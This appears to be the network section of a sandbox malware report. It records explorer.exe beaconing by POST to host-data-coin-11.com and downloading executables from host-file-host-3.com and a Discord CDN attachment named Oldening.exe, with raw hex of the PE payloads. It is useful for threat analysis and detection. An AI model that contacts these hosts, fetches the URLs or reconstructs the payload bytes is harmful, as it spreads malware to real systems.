Dec 1, 2021 09:14:32.594845057 CET	8664	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:32 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.4	49811	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:32.763000965 CET	8665	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jhglqm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 279 Host: host-data-coin-11.com
Dec 1, 2021 09:14:32.863291979 CET	8665	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:32 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.4	49812	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:33.020070076 CET	8666	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pnkfchg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 207 Host: host-data-coin-11.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.4	49813	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.4	49814	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.4	49815	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
57	192.168.2.4	49816	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
58	192.168.2.4	49817	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
59	192.168.2.4	49818	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49761	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:13:56.674941063 CET	1086	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xbbffefnf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 179 Host: host-data-coin-11.com
Dec 1, 2021 09:13:56.778233051 CET	1086	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:13:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.2.4	49819	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.4	49820	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49762	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:13:56.884566069 CET	1087	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fhfscvxar.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 298 Host: host-data-coin-11.com
Dec 1, 2021 09:13:56.989212036 CET	1088	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:13:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 46 eb ab 8f 70 bc 57 da 4a d7 f7 26 84 22 e9 c3 90 50 2a e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9FpWJ&"P*c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49763	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:13:57.375977039 CET	1089	OUT	GET /files/8723_1638191106_2017.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
Dec 1, 2021 09:13:57.461333036 CET	1090	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:13:57 GMT Content-Type: application/x-msdos-program Content-Length: 1285856 Connection: close Last-Modified: Mon, 29 Nov 2021 13:05:06 GMT ETag: "139ee0-5d1ed16faf7da" Accept-Ranges: bytes Data Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 20 3d 15 26 cf ba ee 2f 19 d3 60 ac 4f 9c ef f1 81 8e a1 4f 5b 97 45 f4 e8 76 69 7c ff 44 43 c7 9e 91 5b 41 d1 06 1c 81 dc 16 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b8 78 cc d8 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 10 03 00 00 72 0c 00 00 00 00 00 00 d0 0f 00 00 20 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 17 00 00 04 00 00 5c 1b 14 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 03 00 f4 01 00 00 00 60 03 00 58 6f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 50 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 6f 0c 00 00 60 03 00 58 6f 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 40 07 00 00 d0 0f 00 dd 28 07 00 00 76 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2b fd c3 f3 00 00 00 00 ed 14 0e 00 2f ba 5c 9a 3b 33 29 78 29 6e de aa 7f e6 ad 90 73 d0 6c a5 00 1c 1a 25 15 e6 10 1e 26 c0 8f de a9 3e 68 30 fe e0 82 6c fd 03 94 50 03 00 00 00 00 00 00 00 00 00 ec 50 03 00 8c 50 03 00 a4 50 03 00 00 00 00 00 00 00 00 00 13 51 03 00 9c 50 03 00 b4 50 03 00 00 00 00 00 00 00 00 Data Ascii: MZog':( =&/`OO[Evi\|DC[AQPELx0r @@\@P`Xo@`P@.rsrcXo`Xo@@@(v@+/\;3)x)nsl%&>h0lPPPPQPP

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49764	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:00.132246971 CET	2431	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://byrobmm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: host-data-coin-11.com
Dec 1, 2021 09:14:00.235800028 CET	2432	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49767	162.159.130.233	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 08:14:01 UTC	0	OUT	GET /attachments/914960103592054858/914961866462232616/Oldening.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com
2021-12-01 08:14:01 UTC	0	IN	HTTP/1.1 200 OK Date: Wed, 01 Dec 2021 08:14:01 GMT Content-Type: application/x-msdos-program Content-Length: 397824 Connection: close CF-Ray: 6b6adc08b9bd2b4d-FRA Accept-Ranges: bytes Age: 131760 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Oldening.exe ETag: "5115e5dab211559a85cd0154e8100f53" Expires: Thu, 01 Dec 2022 08:14:01 GMT Last-Modified: Mon, 29 Nov 2021 19:31:48 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1638214308199102 x-goog-hash: crc32c=YIGNXA== x-goog-hash: md5=URXl2rIRVZqFzQFU6BAPUw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 397824 X-GUploader-UploadID: ADPycdvBnSbnjnhwzbmKVJY4AfYuSX_vGG4T8mybDbmzzEh5wTvKrUq6ILGhBDBk0UwTHNlT6meCPadacrFAck7K5BAkDWKQDw X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2021-12-01 08:14:01 UTC	1	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 48 25 32 42 52 63 52 4e 59 73 67 47 64 47 38 61 42 25 32 42 70 47 56 6a 6e 53 48 25 32 42 52 48 71 51 47 59 62 6d 33 5a 49 75 6f 4c 6c 45 41 59 77 4b 39 57 75 75 67 77 52 68 25 32 46 51 70 71 6f 72 73 39 70 25 32 46 39 65 79 5a 6c 42 65 78 57 6b 64 58 41 32 6f 45 49 64 42 57 4c 45 4b 50 6a 57 4a 33 4a 6a 35 6c 59 59 36 64 52 53 4e 51 38 4f 46 69 70 43 6d 76 57 75 6d 66 65 33 7a 4a 42 69 51 59 56 38 7a 75 68 6a 6e 38 25 32 46 36 62 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H%2BRcRNYsgGdG8aB%2BpGVjnSH%2BRHqQGYbm3ZIuoLlEAYwK9WuugwRh%2FQpqors9p%2F9eyZlBexWkdXA2oEIdBWLEKPjWJ3Jj5lYY6dRSNQ8OFipCmvWumfe3zJBiQYV8zuhjn8%2F6bg%3D%3D"}],"group":"cf-nel","max
2021-12-01 08:14:01 UTC	1	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 28 a3 71 d7 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 0a 06 00 00 06 00 00 00 00 00 00 fe 28 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL(q0( @@ @
2021-12-01 08:14:01 UTC	2	IN	Data Raw: 00 00 61 00 30 91 00 06 0b 00 00 01 00 00 61 00 30 97 00 06 24 00 00 01 00 00 00 00 a2 a2 00 06 01 00 00 01 1e 02 6f 25 00 00 0a 2a 1a 7e 06 00 00 04 2a 00 32 28 10 00 00 06 02 80 06 00 00 04 2a 00 00 00 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 00 00 00 13 30 0d 00 a9 00 00 00 00 00 00 00 02 28 05 00 00 0a 02 7e 09 00 00 04 3a 24 00 00 00 16 d0 04 00 00 1b 28 0e 00 00 0a d0 09 00 00 02 28 0e 00 00 0a 28 15 00 00 0a 28 26 00 00 0a 80 09 00 00 04 7e 09 00 00 04 7b 27 00 00 0a 7e 09 00 00 04 7e 08 00 00 04 3a 3a 00 00 00 18 72 df 04 00 70 14 d0 09 00 00 02 28 0e 00 00 0a 18 8d 26 00 00 01 25 16 17 14 28 28 00 00 0a a2 25 17 16 14 28 28 00 00 0a a2 28 29 00 00 0a 28 2a 00 00 0a 80 08 00 00 04 7e 08 00 00 04 7b 2b 00 00 0a 7e 08 00 00 04 02 03 6f 2c Data Ascii: a0a0$o%~2({"}0(~:$((((&~{'~~::rp(&%((%((()(~{+~o,
2021-12-01 08:14:01 UTC	4	IN	Data Raw: 00 70 16 28 08 00 00 06 a2 73 1b 00 00 06 13 06 12 07 fe 15 21 00 00 02 12 10 fe 15 1b 00 00 02 12 10 20 1b 00 10 00 7d 15 00 00 04 11 10 13 08 17 8d 01 00 00 01 25 16 72 3d 00 00 70 16 28 08 00 00 06 a2 73 1b 00 00 06 13 09 02 7b 01 00 00 04 6f 51 00 00 06 25 13 12 39 09 00 00 00 11 12 8e 69 3a 09 00 00 00 16 e0 13 11 38 0b 00 00 00 11 12 16 8f 0d 00 00 01 e0 13 11 11 11 28 07 00 00 0a 13 05 11 11 0b 11 11 07 7b 19 00 00 04 e0 58 0c 14 13 12 07 7b 18 00 00 04 20 4d 5a 00 00 40 10 00 00 00 08 7b 1b 00 00 04 20 50 45 00 00 3b 02 00 00 00 16 2a 08 7c 1d 00 00 04 7b 1e 00 00 04 20 0b 01 00 00 3b 02 00 00 00 16 2a 02 7b 01 00 00 04 6f 51 00 00 06 20 98 03 00 00 18 9c 12 0a fe 15 22 00 00 02 12 0a 11 0a 8c 22 00 00 02 28 08 00 00 0a 7d 2a 00 00 04 12 0a 16 7d Data Ascii: p(s! }%r=p(s{oQ%9i:8({X{ MZ@{ PE;\|{ ;{oQ ""(}*}
2021-12-01 08:14:01 UTC	5	IN	Data Raw: 0b 1e 28 11 00 00 0a 38 12 00 00 00 11 15 17 58 13 15 11 15 20 43 69 08 00 3f c6 ff ff ff 11 06 72 4b 02 00 70 16 28 08 00 00 06 6f 07 00 00 2b 11 07 7b 26 00 00 04 11 08 7b 16 00 00 04 6e 1e 6a 58 28 09 00 00 0a 11 0b 1a 7e 06 00 00 0a 6f 25 00 00 06 3a 6b 00 00 00 11 0b 28 12 00 00 0a 11 06 72 c9 00 00 70 16 28 08 00 00 06 6f 02 00 00 2b 11 07 7b 26 00 00 04 15 6f 29 00 00 06 39 40 00 00 00 11 06 72 13 01 00 70 16 28 08 00 00 06 6f 03 00 00 2b 11 07 7b 26 00 00 04 6f 2d 00 00 06 26 11 06 72 13 01 00 70 16 28 08 00 00 06 6f 03 00 00 2b 11 07 7b 27 00 00 04 6f 2d 00 00 06 26 16 2a 11 0b 28 12 00 00 0a 08 7c 1d 00 00 04 7b 1f 00 00 04 13 0f 12 08 11 0c 11 0f 6e 58 6d 7d 17 00 00 04 06 39 8a 00 00 00 11 06 72 39 03 00 70 16 28 08 00 00 06 6f 09 00 00 2b 11 Data Ascii: (8X Ci?rKp(o+{&{njX(~o%:k(rp(o+{&o)9@rp(o+{&o-&rp(o+{'o-&*(\|{nXm}9r9p(o+
2021-12-01 08:14:01 UTC	6	IN	Data Raw: 00 13 00 1b 00 81 01 10 00 21 01 30 01 05 00 14 00 1f 00 02 01 00 00 3f 01 00 00 09 00 15 00 20 00 02 01 00 00 5b 01 00 00 09 00 15 00 24 00 02 01 00 00 66 01 00 00 09 00 15 00 28 00 02 01 00 00 81 01 00 00 09 00 15 00 2c 00 02 01 00 00 8c 01 00 00 09 00 15 00 30 00 02 01 00 00 a0 01 00 00 09 00 15 00 34 00 02 01 00 00 a7 01 00 00 09 00 15 00 38 00 02 01 00 00 bf 01 00 00 09 00 15 00 3c 00 02 01 00 00 d5 01 00 00 09 00 15 00 40 00 02 01 00 00 ee 01 00 00 09 00 15 00 44 00 02 01 00 00 f5 01 00 00 09 00 15 00 48 00 02 01 00 00 0b 02 00 00 09 00 15 00 4c 00 11 01 10 00 23 02 30 02 0d 00 15 00 50 00 11 01 10 00 52 02 62 02 0d 00 18 00 50 00 11 01 10 00 71 02 51 00 0d 00 1a 00 50 00 11 01 10 00 76 02 de 00 0d 00 1b 00 50 00 11 01 10 00 88 02 8f 02 0d 00 1e 00 Data Ascii: !0? [$f(,048<@DHL#0PRbPqQPvP
2021-12-01 08:14:01 UTC	8	IN	Data Raw: 03 00 86 18 71 03 cc 00 4a 00 00 00 00 00 03 00 c6 01 bd 03 8f 04 4c 00 00 00 00 00 03 00 c6 01 b6 09 a5 04 59 00 00 00 00 00 03 00 c6 01 ed 09 c1 04 67 00 00 00 00 00 03 00 86 18 71 03 cc 00 6b 00 00 00 00 00 03 00 c6 01 bd 03 d0 04 6d 00 00 00 00 00 03 00 c6 01 b6 09 d8 04 70 00 00 00 00 00 03 00 c6 01 ed 09 62 04 74 00 00 00 00 00 03 00 86 18 71 03 cc 00 76 00 00 00 00 00 03 00 c6 01 bd 03 d0 04 78 00 00 00 00 00 03 00 c6 01 b6 09 d8 04 7b 00 00 00 00 00 03 00 c6 01 ed 09 62 04 7f 00 00 00 00 00 03 00 86 18 71 03 cc 00 81 00 00 00 00 00 03 00 c6 01 bd 03 e6 04 83 00 00 00 00 00 03 00 c6 01 b6 09 ec 04 85 00 00 00 00 00 03 00 c6 01 ed 09 f8 04 89 00 00 00 00 00 03 00 86 18 71 03 cc 00 8a 00 00 00 00 00 03 00 c6 01 bd 03 ff 04 8c 00 00 00 00 00 03 00 c6 Data Ascii: qJLYgqkmpbtqvx{bqq
2021-12-01 08:14:01 UTC	9	IN	Data Raw: 00 03 00 a4 0b 00 00 04 00 ad 0b 00 00 05 00 b8 0b 00 00 06 00 c7 0b 00 00 07 00 dd 09 00 00 08 00 e6 09 00 00 01 00 98 0b 00 00 02 00 ad 0b 00 00 03 00 f7 09 00 00 01 00 cf 0b 00 00 02 00 7c 0b 00 20 01 00 69 0b 00 20 01 00 69 0b 00 00 02 00 dd 09 00 00 03 00 e6 09 00 00 01 00 f7 09 00 00 01 00 29 05 00 00 02 00 7c 0b 00 00 01 00 dd 09 00 00 02 00 e6 09 00 00 01 00 f7 09 00 00 01 00 d4 0b 00 00 02 00 6a 0a 00 00 01 00 d8 0b 00 00 02 00 dd 0b 00 00 01 00 d8 0b 00 00 02 00 dd 0b 00 00 03 00 dd 09 00 00 04 00 e6 09 00 00 01 00 f7 09 00 00 01 00 98 09 00 00 01 00 9d 03 31 00 71 03 b0 00 0c 00 71 03 cc 00 0c 00 bd 03 d2 00 59 00 71 03 d7 00 09 00 71 03 d7 00 51 00 36 04 10 01 51 00 3b 04 13 01 89 00 4f 04 19 01 51 00 3b 04 1e 01 91 00 77 04 28 01 51 00 8a 04 Data Ascii: \| i i)\|j1qqYqqQ6Q;OQ;w(Q
2021-12-01 08:14:01 UTC	10	IN	Data Raw: 0e 00 17 00 0e 00 18 00 0e 00 19 00 0e 00 1a 00 0e 00 25 00 24 00 00 00 04 00 39 00 4e 09 38 00 23 01 38 00 32 01 38 00 37 01 38 00 41 01 38 00 46 01 38 00 4b 01 38 00 50 01 38 00 66 01 38 00 7e 01 38 00 83 01 38 00 4a 02 38 00 4f 02 00 4f 6c 64 65 6e 69 6e 67 00 4f 6c 64 65 6e 69 6e 67 2e 65 78 65 00 3c 4d 6f 64 75 6c 65 3e 00 49 6e 66 6f 00 4f 6c 64 65 6e 69 6e 67 2e 4d 61 70 73 00 4f 62 6a 65 63 74 00 53 79 73 74 65 6d 00 6d 73 63 6f 72 6c 69 62 00 57 6f 72 6b 65 72 00 4f 6c 64 65 6e 69 6e 67 2e 53 68 61 72 65 64 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 32 5f 30 00 49 6e 69 74 69 61 6c 69 7a 65 72 4d 65 73 73 61 67 65 44 65 53 65 72 69 61 6c 69 7a 65 72 00 4f 6c 64 65 6e 69 6e 67 2e 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 00 4d 6f 64 65 6c Data Ascii: %$9N8#82878A8F8K8P8f8~88J8OOldeningOldening.exe<Module>InfoOldening.MapsObjectSystemmscorlibWorkerOldening.Shared<>c__DisplayClass2_0InitializerMessageDeSerializerOldening.SerializationModel
